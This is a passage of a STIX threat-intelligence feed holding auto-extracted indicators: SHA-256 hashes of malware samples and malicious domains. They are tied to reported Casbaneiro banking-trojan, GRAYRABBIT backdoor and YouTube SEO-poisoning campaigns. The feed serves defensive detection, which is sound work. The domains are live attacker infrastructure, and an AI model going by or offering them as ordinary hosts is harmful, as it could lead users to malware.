395403d6a3df9d8da179f3cd5faf81b1 HTA downloader HTA SHA-256 875e8d4137e1016b4be869e36e00a9414e89902fd5592a2fb881ebb0e4bd2f8b HTA downloader HTA SHA-256 bd724bbb27f9a71fd44f1c334b003541","pattern":"[file:hashes.'SHA-256' = '875e8d4137e1016b4be869e36e00a9414e89902fd5592a2fb881ebb0e4bd2f8b']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b5b40b33-3d52-4db3-a28d-75e2c99ebce7","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 92a1428e125f33de012c7f52fb0827be3d7e90e38a0e38083181f8c3312adc9c","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: adb8c5ff4e32e6a41fdf508455c5b697 HTA downloader HTA SHA-256 92a1428e125f33de012c7f52fb0827be3d7e90e38a0e38083181f8c3312adc9c HTA downloader HTA SHA-256 e57409c5e1f8287900c1c3b3e8c099ce","pattern":"[file:hashes.'SHA-256' = '92a1428e125f33de012c7f52fb0827be3d7e90e38a0e38083181f8c3312adc9c']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--49392910-2894-4022-b2f3-13c06a3816a9","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 943d63ace373ee50d074daf84d357f8e5e62ff91c829d87f566bee453d715280","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 9f4a7d6ac2e0385472298f384fc8 Malicious PDF lure PDF SHA-256 943d63ace373ee50d074daf84d357f8e5e62ff91c829d87f566bee453d715280 Malicious PDF lure PDF SHA-256 711c0aa8cde078aa349fb329e3e4","pattern":"[file:hashes.'SHA-256' = '943d63ace373ee50d074daf84d357f8e5e62ff91c829d87f566bee453d715280']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e4ac52f-9ea0-4ed8-9b80-a37d79fa4737","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 99fcabf7c996d6ec077ccd745a158a3a395403d6a3df9d8da179f3cd5faf81b1","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: c00dae6812c03bba019edf9c059ece33 HTA downloader HTA SHA-256 99fcabf7c996d6ec077ccd745a158a3a395403d6a3df9d8da179f3cd5faf81b1 HTA downloader HTA SHA-256 875e8d4137e1016b4be869e36e00a941","pattern":"[file:hashes.'SHA-256' = '99fcabf7c996d6ec077ccd745a158a3a395403d6a3df9d8da179f3cd5faf81b1']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2de3a47-af85-4d32-af89-bc909e16992a","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: a42daeca71a6bdc79fd66b8b6ee413562abf7f72ef093292c86c1e9e7c2be456","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 761071655fa585b64eed3bd78fc28e01 HTA downloader HTA SHA-256 a42daeca71a6bdc79fd66b8b6ee413562abf7f72ef093292c86c1e9e7c2be456 HTA downloader HTA SHA-256 7e04e86c07213fed7bebccd9953818b1","pattern":"[file:hashes.'SHA-256' = 'a42daeca71a6bdc79fd66b8b6ee413562abf7f72ef093292c86c1e9e7c2be456']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--caafa57d-cdeb-422e-99c2-69266986b24d","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: bd724bbb27f9a71fd44f1c334b003541761071655fa585b64eed3bd78fc28e01","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 4e89902fd5592a2fb881ebb0e4bd2f8b HTA downloader HTA SHA-256 bd724bbb27f9a71fd44f1c334b003541761071655fa585b64eed3bd78fc28e01 HTA downloader HTA SHA-256 a42daeca71a6bdc79fd66b8b6ee41356","pattern":"[file:hashes.'SHA-256' = 'bd724bbb27f9a71fd44f1c334b003541761071655fa585b64eed3bd78fc28e01']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--57023569-91fe-4d86-b196-23a4df402573","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: bf92a287a3d79afb73a3f2d38877ec37c22a9f4a7d6ac2e0385472298f384fc8","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 96feea0d355732af5bea459db1dd Malicious PDF lure PDF SHA-256 bf92a287a3d79afb73a3f2d38877ec37c22a9f4a7d6ac2e0385472298f384fc8 Malicious PDF lure PDF SHA-256 943d63ace373ee50d074daf84d35","pattern":"[file:hashes.'SHA-256' = 'bf92a287a3d79afb73a3f2d38877ec37c22a9f4a7d6ac2e0385472298f384fc8']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29c3931f-1320-4ea9-87d8-81008b91a3d2","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: c477bdfae91e3df9be29e9eeba785467aff294f5250c2eed406765032cb68756","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 485688b5958d82fcb072a837e27e246b HTA downloader HTA SHA-256 c477bdfae91e3df9be29e9eeba785467aff294f5250c2eed406765032cb68756 HTA downloader HTA SHA-256 6e6bd2f7566ffa52d52fa9d5f048bbb9","pattern":"[file:hashes.'SHA-256' = 'c477bdfae91e3df9be29e9eeba785467aff294f5250c2eed406765032cb68756']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0eb0e7a5-028e-40b9-96c1-79ec5cd7ddbf","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: c521b3a189b0089a2558aa4e42bd9fb5558e1b17917e2e183a4bd9cbcb2ed77e","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: fae0b57d708aebd77d99667616d5 Malicious PDF lure PDF SHA-256 c521b3a189b0089a2558aa4e42bd9fb5558e1b17917e2e183a4bd9cbcb2ed77e Malicious PDF lure PDF SHA-256 0849a6b87fbef25089ad0be746f8","pattern":"[file:hashes.'SHA-256' = 'c521b3a189b0089a2558aa4e42bd9fb5558e1b17917e2e183a4bd9cbcb2ed77e']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5d31402e-c788-41d1-865c-414c95d52cfc","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d04f68079ca90c65223a907f23fae5d068904a2145348b953b1d06e2eaf0bf2c","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 7b3ce6db57566ed7bd0e92d03d85 Malicious PDF lure PDF SHA-256 d04f68079ca90c65223a907f23fae5d068904a2145348b953b1d06e2eaf0bf2c Malicious PDF lure PDF SHA-256 1b4d5c95f4fc037ca3c359cea5ca","pattern":"[file:hashes.'SHA-256' = 'd04f68079ca90c65223a907f23fae5d068904a2145348b953b1d06e2eaf0bf2c']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b1f3076b-92af-4130-b055-2eac0fdc2885","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d13ad6fc5fda54e65f1214e554a5123126ac7b3ce6db57566ed7bd0e92d03d85","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 1a2f0f8eac289e6b653a5d126f95 Malicious PDF lure PDF SHA-256 d13ad6fc5fda54e65f1214e554a5123126ac7b3ce6db57566ed7bd0e92d03d85 Malicious PDF lure PDF SHA-256 d04f68079ca90c65223a907f23fa","pattern":"[file:hashes.'SHA-256' = 'd13ad6fc5fda54e65f1214e554a5123126ac7b3ce6db57566ed7bd0e92d03d85']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67fb659d-4199-406f-8e8e-d804f753edb9","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d910e08a11a4f6f764e7495f4602a00b6024ca6e1b70fe30ba3752b881574365","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 66a5e651ad8a64893c76a725c859 Malicious PDF lure PDF SHA-256 d910e08a11a4f6f764e7495f4602a00b6024ca6e1b70fe30ba3752b881574365 Malicious PDF lure PDF SHA-256 47d321c1a232e5cdd1e39a06dadb","pattern":"[file:hashes.'SHA-256' = 'd910e08a11a4f6f764e7495f4602a00b6024ca6e1b70fe30ba3752b881574365']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5cadd416-4ddc-4887-a0f8-8cf19212e1ad","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: e57409c5e1f8287900c1c3b3e8c099cef537a02949315eb768c88906b0c65add","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 3d7e90e38a0e38083181f8c3312adc9c HTA downloader HTA SHA-256 e57409c5e1f8287900c1c3b3e8c099cef537a02949315eb768c88906b0c65add HTA downloader HTA SHA-256 5a76669ec410d0b3e21112a4a6fd3207","pattern":"[file:hashes.'SHA-256' = 'e57409c5e1f8287900c1c3b3e8c099cef537a02949315eb768c88906b0c65add']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b0c3d29d-8ff2-42f7-82e3-d44fa0ab57db","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: ea8af591fe2d605c82bb7831d2ebdfb17cb2659880e1a8a7b0a2dd851dc5e7a3","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: b82816a8353e9a8a574bfde5f491 Malicious PDF lure PDF SHA-256 ea8af591fe2d605c82bb7831d2ebdfb17cb2659880e1a8a7b0a2dd851dc5e7a3 Malicious PDF lure PDF SHA-256 0b4d962eef2d06abfe08a8cd0b15","pattern":"[file:hashes.'SHA-256' = 'ea8af591fe2d605c82bb7831d2ebdfb17cb2659880e1a8a7b0a2dd851dc5e7a3']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b9e2ca2f-64d5-4084-823e-c15b427a060b","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: f1aa14ebfd2da477edba94b34f09f775485688b5958d82fcb072a837e27e246b","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 8857308b3a1185e6f4ebc4164db8584f HTA downloader HTA SHA-256 f1aa14ebfd2da477edba94b34f09f775485688b5958d82fcb072a837e27e246b HTA downloader HTA SHA-256 c477bdfae91e3df9be29e9eeba785467","pattern":"[file:hashes.'SHA-256' = 'f1aa14ebfd2da477edba94b34f09f775485688b5958d82fcb072a837e27e246b']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e02d1e14-d37c-4876-8e88-d323f03c611d","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: f76d09cbd455ce18765591b9efa3bde0d31358b6321f7a10fc2e04f65d7407ba","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: b07b25cc7d910 AutoIt loader component AutoIt script SHA-256 f76d09cbd455ce18765591b9efa3bde0d31358b6321f7a10fc2e04f65d7407ba AutoIt loader component Casbaneiro payload SHA-256 7de63753","pattern":"[file:hashes.'SHA-256' = 'f76d09cbd455ce18765591b9efa3bde0d31358b6321f7a10fc2e04f65d7407ba']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c1019808-6e58-44ce-ab95-58ae0ccf9f84","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: fc820eeb054c781693eca78fed1c418f12b27da2c7c7e73281eb07b25cc7d910","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 99[.]188[.]28 Campaign infrastructure AutoIt script SHA-256 fc820eeb054c781693eca78fed1c418f12b27da2c7c7e73281eb07b25cc7d910 AutoIt loader component AutoIt script SHA-256 f76d09cbd455c","pattern":"[file:hashes.'SHA-256' = 'fc820eeb054c781693eca78fed1c418f12b27da2c7c7e73281eb07b25cc7d910']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cd77c6eb-8766-41f9-9f44-e210371e9adc","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: noht1ng.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: ryption RC4-encrypted communications Exploit-hosting domain noht1ng[.]top Staging-server IP address 8.218.50[.]207 Staging-server p","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9d9fe0a3-b344-459a-8159-c04443140612","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: uaiubifas.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: re. In this campaign, the payload reportedly contacted mail.uaiubifas[.]top over raw TCP port 443 and encrypted fixed-size 4,096-byte","pattern":"[domain-name:value = 'uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--78577c20-c410-47c4-8ee5-9dc0f7ab42c1","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: involving 7-Zip binaries. IOCs Indicator Value SHA-256 hash 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63 Associated file 7zp.dll File description Trojanized DLL loa","pattern":"[file:hashes.'SHA-256' = '29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5e02a7ea-76bc-4115-93f7-7b82ecf1fedb","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: on Trojanized DLL loader Internal name boy.dll SHA-256 hash 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e Associated file p File description Encrypted PE loader shel","pattern":"[file:hashes.'SHA-256' = '749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--357b2289-5509-4ffb-b92d-6d109eee0cf0","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: File description Encrypted PE loader shellcode SHA-256 hash d7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a Associated malware GRAYRABBIT backdoor Internal name core.d","pattern":"[file:hashes.'SHA-256' = 'd7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ba7fdfb9-73c2-4403-9528-3c3436b54f38","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: achievershelf.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: to CL-CRI-1171 activity and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[","pattern":"[domain-name:value = 'achievershelf.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d0a95def-a11e-4797-9616-e085e433b34e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: activitykitty.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CL-CRI-1171 gate and landing infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ;","pattern":"[domain-name:value = 'activitykitty.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d84ca52-4ee6-434a-9cf2-84ad6d57052c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: activitymeal.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[","pattern":"[domain-name:value = 'activitymeal.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f8e8e1f9-4667-4dbc-9e8d-f3bd72cc531b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: additionplot.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementju","pattern":"[domain-name:value = 'additionplot.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52653618-1e15-435b-8c37-80eb489782c1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: adviceturn.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: shelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airpl","pattern":"[domain-name:value = 'adviceturn.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd943b51-9892-4155-bc27-000fb96232ff","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: afternoonscrew.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ivitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.","pattern":"[domain-name:value = 'afternoonscrew.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c4ada124-e8e9-47a0-b5be-aeaa168f276d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: agreementjuice.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ;","pattern":"[domain-name:value = 'agreementjuice.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f674a702-7fb4-4d39-9e58-188256606cb4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: airplaneiron.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: n[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ;","pattern":"[domain-name:value = 'airplaneiron.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--375d5b7d-2d1d-4bbd-9875-ce85ded8854b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: airtwig.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[","pattern":"[domain-name:value = 'airtwig.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 